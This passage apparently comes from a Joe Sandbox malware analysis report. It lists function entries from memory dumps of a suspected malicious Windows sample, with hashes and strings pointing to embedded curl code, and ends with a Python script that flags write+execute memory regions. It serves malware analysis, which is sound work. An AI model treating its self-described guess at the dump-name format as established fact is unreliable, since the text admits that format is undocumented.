• Instruction ID: 6451b25ccdec7caaf02c06d6afcf604b51874778832e6b2b180e71683b07652c
• Opcode Fuzzy Hash: 0ee12eaf8511419a29a32d9d2730f2c0ad42978531c2ac2553e0169621277e6d
• Instruction Fuzzy Hash: F9E242B1A087828FC720DF29C49075AFBE2BF89744F14891DE8959B361E775E845CF82
Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
                                    • API String ID: 0-424504254
                                    • Opcode ID: 6ed0acbf7c464edd32817248e4254b6e51ee57ece855355a6b52ec74ffb0a1a8
                                    • Instruction ID: 7a344a047934b43a2e1f794475a22a5ea784c3a9d342d8232a995e9b90b60ad1
                                    • Opcode Fuzzy Hash: 6ed0acbf7c464edd32817248e4254b6e51ee57ece855355a6b52ec74ffb0a1a8
                                    • Instruction Fuzzy Hash: 60319D63A2834A5BE7261D3C5C84B35BAC35F91398F1C037CEA95973D2F6698C20C391
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #$4
                                    • API String ID: 0-353776824
                                    • Opcode ID: d4eaa64d9704e2f395dd9c34a93318366da7a6ad60af8e30a19f0dc50d972d81
                                    • Instruction ID: a12dbbd20bc2ef30bcdd005c884d936f2e610310e4746a12aab2efae0b220798
                                    • Opcode Fuzzy Hash: d4eaa64d9704e2f395dd9c34a93318366da7a6ad60af8e30a19f0dc50d972d81
                                    • Instruction Fuzzy Hash: 9222C0315087428FC314DF28C8806AFF7E2FF85718F158A2EE89997391D774A895CB96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #$4
                                    • API String ID: 0-353776824
                                    • Opcode ID: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                    • Instruction ID: b601844ef7ece0118aebd87ee921f8f5fc5293e3a953f2e01e7d704b49992191
                                    • Opcode Fuzzy Hash: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                    • Instruction Fuzzy Hash: BA12E332A087018BC724CF18C4807ABB7E2FFC4718F198A7DE9995B391D7749884CB96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: H$xn--
                                    • API String ID: 0-4022323365
                                    • Opcode ID: ba98885c81f7fa494bdd5047c8f455d032313bc0cf9080200a00e0465fad2ffd
                                    • Instruction ID: b1c04f92a076b36ca3fdb3d3ed12ff5645d4da5c7e2f0a780f95dbdbc85fc997
                                    • Opcode Fuzzy Hash: ba98885c81f7fa494bdd5047c8f455d032313bc0cf9080200a00e0465fad2ffd
                                    • Instruction Fuzzy Hash: 21E107326087154BD718DE28D8C066AB7E3AFC4319F188ABDDD9687385EB74DC898742
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Downgrades to HTTP/1.1$multi.c
                                    • API String ID: 0-3089350377
                                    • Opcode ID: 1a08c8092ec32c45b966dea0252098253d124383cbed7e605d79049474887f6e
                                    • Instruction ID: 2f974248d43c762ca6caca06007741303c8d7f6c3476a3b83d228bb15fe1496c
                                    • Opcode Fuzzy Hash: 1a08c8092ec32c45b966dea0252098253d124383cbed7e605d79049474887f6e
                                    • Instruction Fuzzy Hash: 8DC13970A643829BD710DF26D88176AB7E0BF94304F94453DF94997292E7B0E978CB83
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: M 0.$NT L
                                    • API String ID: 0-1807112707
                                    • Opcode ID: 61e3137008f377f99432a7d4f4c86f1306670eb5bf3d511828d3050f8d32b507
                                    • Instruction ID: 839a1206c1789d36035e65c3bdde305cc025e0ee23586c7d32a2e6a0e181cda1
                                    • Opcode Fuzzy Hash: 61e3137008f377f99432a7d4f4c86f1306670eb5bf3d511828d3050f8d32b507
                                    • Instruction Fuzzy Hash: 5351E5746047409BDB12DF20C8D47AA77F8BF45304F15856DEC889F292E375EA84CB96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: M3
                                    • API String ID: 0-506905794
                                    • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                    • Instruction ID: 0f0341d088c9e0ece965b19e9e234ef0cc1fa7c6640947eb8e92b053d8ab290b
                                    • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                    • Instruction Fuzzy Hash: D12264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: D
                                    • API String ID: 0-2746444292
                                    • Opcode ID: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                    • Instruction ID: da2adf792ae0f1bf25635d13a9a9ae6d456f066bde0ba1fd44d9a201f44987e6
                                    • Opcode Fuzzy Hash: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                    • Instruction Fuzzy Hash: D832697290C3818FC325DF28D4806AAF7E2BFD9304F158A6DE9D953351DB30A945CB82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: H
                                    • API String ID: 0-2852464175
                                    • Opcode ID: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                    • Instruction ID: 42950ab29d6312790ec9a1a675437258a188ae8bc6b08172599a16df6e588ad8
                                    • Opcode Fuzzy Hash: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                    • Instruction Fuzzy Hash: AD91C7357083118FCB1ECE1DC49016EB7E3EBCA314F1A853DD99697791DA31AC468B85
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: curl
                                    • API String ID: 0-65018701
                                    • Opcode ID: a93cb2207dc1c670e9b0a878c11dbc1b1ea8ab460838dcf0d9ee07960deef1ba
                                    • Instruction ID: 7cf2455f6edf43724c430ca275c83f630dde4d8aa0bff1733dd53121c1b3f3c9
                                    • Opcode Fuzzy Hash: a93cb2207dc1c670e9b0a878c11dbc1b1ea8ab460838dcf0d9ee07960deef1ba
                                    • Instruction Fuzzy Hash: BF6186B18047449BD721DF24C881B9BB3F9EF99304F44962DFD489B212EB71E698C752
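Every function entry on this page follows the same template: a Source File dump, a list of Associated dumps, the IDA snapshot, and the Similarity fields (String ID, Opcode ID, fuzzy hashes). The dumps are named by dotted hex fields, and the one every entry is sourced from (base 002D1000, protection 00000040) sits inside the mapped image with write and execute rights, which is consistent with the "changes PE section rights" and "self modifying code" signatures at the top of the report. Below is an added example, not code from the Joe Sandbox report or from Joe Security, that parses a constructed excerpt of these entries (copied from this page and trimmed), strips the "Download File" link text left by the HTML export, decodes the .sdmp name fields and lists the regions dumped with a write+execute protection. The field layout (base address followed by the Protect, State and Type values of MEMORY_BASIC_INFORMATION) is an assumption fitted to the observed names; the report does not document it.

```python
"""Parse Joe Sandbox function entries ('Memory Dump Source' / 'Similarity')
and flag dumps taken from writable+executable memory.
Added example; not code from the report or from Joe Security."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# Windows PAGE_* protection constants (winnt.h).
PAGE_NAMES = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
              0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
WRITE_EXEC = {0x40, 0x80}

# ASSUMPTION: a .sdmp name is <process>.<phase>.<dump id>.<base>.<Protect>.<State>.<Type>.<module>,
# i.e. the MEMORY_BASIC_INFORMATION values at dump time (0x40 = RWX, 0x00000001 = MEM_COMMIT,
# 0x01000000 = MEM_IMAGE). The report does not document this; the decode is a heuristic.
SDMP_RE = re.compile(r"([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\."
                     r"([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp", re.I)

@dataclass
class Dump:
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def writable_executable(self) -> bool:
        return (self.protect & 0xFF) in WRITE_EXEC

@dataclass
class FuncEntry:
    opcode_id: str = ""
    string_id: str = ""
    source: Optional[Dump] = None
    associated: list = field(default_factory=list)

def parse_sdmp(text: str) -> Dump:
    m = SDMP_RE.search(text)
    if not m:
        raise ValueError(f"no .sdmp name in {text!r}")
    return Dump(int(m[4], 16), int(m[5], 16), int(m[6], 16), int(m[7], 16))

def parse_entries(text: str) -> list[FuncEntry]:
    entries: list[FuncEntry] = []
    cur = None
    for raw in text.splitlines():
        # Drop the bullet and the 'Download File' link text left by the HTML export.
        line = raw.strip().lstrip("• ").removesuffix("Download File").strip()
        if line == "Memory Dump Source":
            cur = FuncEntry()
            entries.append(cur)
        elif cur is None:
            continue
        elif line.startswith("Source File:"):
            cur.source = parse_sdmp(line)
        elif line.startswith("Associated:"):
            cur.associated.append(parse_sdmp(line))
        elif line.startswith("String ID:"):
            cur.string_id = line.split(":", 1)[1].strip()
        elif line.startswith("Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
    return entries

def rwx_regions(entries: list[FuncEntry]) -> dict[int, str]:
    """Distinct bases dumped with a write+execute protection, mapped to its PAGE_* name."""
    found: dict[int, str] = {}
    for e in entries:
        for d in [e.source, *e.associated]:
            if d is not None and d.writable_executable:
                found[d.base] = PAGE_NAMES.get(d.protect & 0xFF, hex(d.protect))
    return dict(sorted(found.items()))

def strings_of_interest(entries: list[FuncEntry]) -> dict[str, str]:
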